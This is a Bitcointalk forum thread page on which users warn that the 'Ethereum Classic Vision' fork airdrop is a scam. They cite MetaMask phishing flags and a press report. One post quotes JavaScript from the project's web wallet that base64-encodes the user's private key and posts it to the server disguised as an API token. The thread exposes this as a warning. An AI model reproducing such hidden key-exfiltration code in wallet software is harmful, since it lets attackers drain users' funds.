Bitcoin Forum
April 25, 2024, 12:01:46 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28] 29 30 31 32 33 34 35 36 »
  Print  
Author Topic: [ANN] [ETCV] Ethereum Classic Vision | Fork 3:1 of Ethereum  (Read 32218 times)
marlboroza
Legendary

Activity: 1932
Merit: 2270

View Profile
January 10, 2019, 09:48:26 PM

This was found in the web wallet for anybody that still has any doubt if this is legit or not  Roll Eyes:

There is another one existing name Ethereum Vision they are all anonymous also, but they are not going for an ICO instead a fork where you can get an ethereum vision token if you have 1 eth in your wallet, I'm following the development in their telegram channel if they happen to ask for private key or link us to phishing site then it's over for them.

Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:

$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });

https://etcvwallet.com/cgi-sys/suspendedpage.cgi
"You Asked For Change, We Gave You Coins" -- casascius
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
Piggy

Activity: 784
Merit: 1416

View Profile WWW
January 10, 2019, 10:03:16 PM

I archived the page in here earlier http://archive.is/pp8Sd it may have saved that part of the code as well. I'm on the phone and cannot check.

JohnUser

Activity: 1022
Merit: 725

View Profile WWW
January 10, 2019, 10:14:49 PM

I archived the page in here earlier http://archive.is/pp8Sd it may have saved that part of the code as well. I'm on the phone and cannot check.

Funny archive, for that one who don't have time :

kaoncondensate

Activity: 5
Merit: 0

View Profile
January 10, 2019, 11:07:33 PM

https://decryptmedia.com/4439/ethereum-hard-fork-scam

According to Guarda, which provides multiple cryptocurrency wallets, “Ethereum Classic Vision looked more solid [than the Ethereum Nowa hard fork] at first glance, but analysis on the code performed by our team has shown the piece of code provided actually sends your private key data on the Ethereum Classic Vision servers, masking it as an API token.” This means it captures your private key data without you even knowing–which will enable it to move all your funds outside of your Ethereum wallet, if you download the one on its website. Indeed,  MetaMask has even blacklisted it and placed on the domain warning list. In addition, the projects Github repository—where hard fork code would be stored—is empty.

Phew.... any rebuttal to the accusations, guys?
CaVO32

Activity: 1848
Merit: 158

View Profile
January 10, 2019, 11:11:40 PM

According to Guarda, which provides multiple cryptocurrency wallets, “Ethereum Classic Vision looked more solid [than the Ethereum Nowa hard fork] at first glance, but analysis on the code performed by our team has shown the piece of code provided actually sends your private key data on the Ethereum Classic Vision servers, masking it as an API token.” This means it captures your private key data without you even knowing–which will enable it to move all your funds outside of your Ethereum wallet, if you download the one on its website. Indeed,  MetaMask has even blacklisted it and placed on the domain warning list. In addition, the projects Github repository—where hard fork code would be stored—is empty.

also, this scam accusation from them

https://bitcointalk.org/index.php?topic=5095475.0

this is not looking good though. if they are totally legit, they will answer such accusations. just be careful guys, signing up anything from their website.
Endikadija

Activity: 1458
Merit: 509

View Profile
January 10, 2019, 11:45:45 PM

It has already predicted from the start. I guess what will be happening if a lot of people are still joining in this scam airdrop? This scammer will be checking the private key at the time of hardfork execution and your ether will disappear being stolen by this scammer.
Atomicc

Activity: 301
Merit: 31

View Profile
January 10, 2019, 11:47:34 PM

The Block number of snapshot, is it written somewhere?
--DarkSecrets--

Activity: 854
Merit: 500

Stake & Vote or Become a IoTeX Delegate!

View Profile
January 10, 2019, 11:48:55 PM
Last edit: January 11, 2019, 05:18:00 AM by --DarkSecrets--

According to Guarda, which provides multiple cryptocurrency wallets, “Ethereum Classic Vision looked more solid [than the Ethereum Nowa hard fork] at first glance, but analysis on the code performed by our team has shown the piece of code provided actually sends your private key data on the Ethereum Classic Vision servers, masking it as an API token.” This means it captures your private key data without you even knowing–which will enable it to move all your funds outside of your Ethereum wallet, if you download the one on its website. Indeed,  MetaMask has even blacklisted it and placed on the domain warning list. In addition, the projects Github repository—where hard fork code would be stored—is empty.

also, this scam accusation from them

https://bitcointalk.org/index.php?topic=5095475.0

this is not looking good though. if they are totally legit, they will answer such accusations. just be careful guys, signing up anything from their website.

Those accusations have no strong proofs to show and they have not really needed to answer that accusations becauae they have the right to remain silent and just a hours for the fork to begin. At this point i haven't seen any risk because in order to receive (as far as i know) everyone who wants to have this etcv coin must have their eth on the required wallets. Correct me if I'm wrong but to be safe if it is a scam or not just don't log in your private keys or what personal wallets or informations they required. 

`^cder.         
          '-`ryRQQ#@@#O}-       
       .)ydi`!]PQQ#@@@@@#d}!   
  `:'`rU9660ZL:')TZ@@@@@@####O)
  `lVx<,:xWg@@@#g)iQB##@@##@@@M
  `lVcyWRBsy@@Q8Z*iQQQQB##@@@@M
  `x|G#@@@m)T<:<v~iB##@@#QQB#@M
     `)I$#m,-' `>]ZB#@@@#QQQB#3
  .>LKlxxxx_`<YUaKOQQQB#BB####P
:V5MMMTx^=*` .~xeaOQQg$RB@@@##P
 .<}ab*' .QQK\_`;<YMRO66B@@@@B}
     .`  .Q#@#Q3v`rcvvY3B#Mx_   
         .OKx*rxv`x66OX]=`     
               .!`xRdyr,       
                  !<'

IoTeX

▬▬INTERNET OF TRUSTED THINGS.▬▬
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬.
▬▬▬▬BECOME A MEMBER TODAY▬▬▬.

▄███████████████████▄
        █████████████████████
▄█████  █████████████████████
██████  ████             ████
███     █████████████████████
██████  ████             ████
██████  █████████████████████
███     █████████████████████
███████ ▀███████████████████▀
▀███████▄▄▄▄▄▄▄       ▀████
  ████▌                 ██   
  ▐██▌                       
   █▌

TWITTER
MEDIUM
REDDIT
TELEGRAM
FORUM
BITCOINTALK
Kawal

Activity: 3

View Profile
January 11, 2019, 02:36:29 AM

Now they have this site https://etcv-wallet.com/    ( its open when u click WEBWALLET link on  https://ethereumcv.io/#wallets )

Its scam or not??
Kang Bahar

Activity: 504
Merit: 115

Silent Reader~

View Profile WWW
January 11, 2019, 03:58:16 AM
Last edit: January 11, 2019, 04:29:11 AM by Kang Bahar

Today is 01/11/2019. Any news & update about your "fake" hard fork dev? Tongue

I don't know, but I don't fall into greedily join this fork.
It's safer to stay with my ETH ^^
I think the best way is not to sign up anything on them requiring your private keys to proceed. Better be safe than sorry.
Smart choice Wink
Twinkledoe

Activity: 1904
Merit: 138

★Bitvest.io★ Play Plinko or Invest!

View Profile
January 11, 2019, 04:23:07 AM

Today is 01/11/2019. Any news & update about your "fake" hard fork dev? Tongue

I don't know, but I don't fall into greedily join this fork.
It's safer to stay with my ETH ^^
Smart choice Wink

I think the best way is not to sign up anything on them requiring your private keys to proceed. Better be safe than sorry.
goigiacmove

Activity: 121
Merit: 10

View Profile
January 11, 2019, 04:26:44 AM

Right.
This one looks like a fake-fork.
And which sorts of vision of ETCV from which the project can mature well over time?
I don't see convincing vision from them.
JohnUser

Activity: 1022
Merit: 725

View Profile WWW
January 11, 2019, 06:50:10 AM
Last edit: January 11, 2019, 04:08:30 PM by JohnUser

However, it is clear that something is not right. I say this because I saw phishing signals on metamask that only warn when there is evidence.
  Please see:

ATTENTION
MetaMask believes this domain has malicious intent and has prevented you from interacting with it.

This is because the site tested positive on the Ethereum Phishing Detector.

You can turn MetaMask off to interact with this site, but it's advised not to.

If you think this domain is incorrectly flagged, please file an issue. Good luck.
lobo13hf

Activity: 2268
Merit: 507

View Profile
January 11, 2019, 07:31:03 AM

Right.
This one looks like a fake-fork.
And which sorts of vision of ETCV from which the project can mature well over time?
I don't see convincing vision from them.
The developer just tries to take the advantages from real ethereum hardfork called as Constantinople. The creator of this fork need your privatekey and send them to their servers that means if you are putting your ethereum to that key and it may disappear after the developers are checking from one to another private key. He will be stealing ethereum and in return you get shitty scam token called etcv.

I trust metamask rather than anonymous scammer like the creator of this shitty airdrop.

████▄██████████▄
███▄████████████
▄███▀
████
████
████
▀███▄
███▀████████████
████▀██████████▀

▄██████████▄
████████████
███████████▀███▄
████████████████
████████████████
████████████████
▀███▄███████████
████████████████
████▀██████████▀

▄██▄█████████▄██▄
▀████▄█████▄████▀
▀████▄▄████▀
███████████
▄███▀█████▀███▄
█████████████████
█████████████████
█████████████████
▀███████████████▀

▄███████████████▄
█████████████████
████▀███▀██████▀
███████▄█████▀
████▄▄██████████▄
▀▀██████▀███████
▄██████▄███▄████
█████▀██████████
▀██▀███▀████████▀

████▄███████████
████████████████
▄███▀███████████
███████████████
██████████████
████████████████
███████████▄███▀
████████████
▀██████████▀
████████
██
██
██
██
██
██
██
██

██
██
██
██
██

██
██
██
████████
|
Listed
on
BINANCE
KUCOIN
Gate.io
|
p2pbucks

Activity: 642
Merit: 500

Evolution is the only way to survive

View Profile
January 11, 2019, 08:59:31 AM

It has already predicted from the start. I guess what will be happening if a lot of people are still joining in this scam airdrop? This scammer will be checking the private key at the time of hardfork execution and your ether will disappear being stolen by this scammer.
Thats only a snapshot, it's safe to send your eth to another addr before you claim the airdrop
NedStrex

Activity: 140
Merit: 2

View Profile
January 11, 2019, 09:13:10 AM

How can I check my ECTV balance after the fork?
Arcurislahalyn

Activity: 364
Merit: 1

View Profile
January 11, 2019, 09:21:25 AM

How can I check my ECTV balance after the fork?

If I understand correctly, tokens will be automatically credited to the MEW wallet. Wink
TheDevo

Activity: 119
Merit: 2

View Profile
January 11, 2019, 09:38:54 AM

on which block will the wallet status be taken?
Piggy

Activity: 784
Merit: 1416

View Profile WWW
January 11, 2019, 09:41:37 AM

They put up a new website for the Web wallet https://etcv-wallet.com/ after the other got flagged as phishing.

It still contains the same malicious code to steal your private key as before, the site is not flagged yet.

bitcoindiego

Activity: 22

View Profile
January 11, 2019, 09:51:14 AM

They put up a new website for the Web wallet https://etcv-wallet.com/ after the other got flagged as phishing.

It still contains the same malicious code to steal your private key as before, the site is not flagged yet.

Lol they still trying to get any eth they can  from people.  They will be few for sure
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28] 29 30 31 32 33 34 35 36 »
  Print  

Jump to: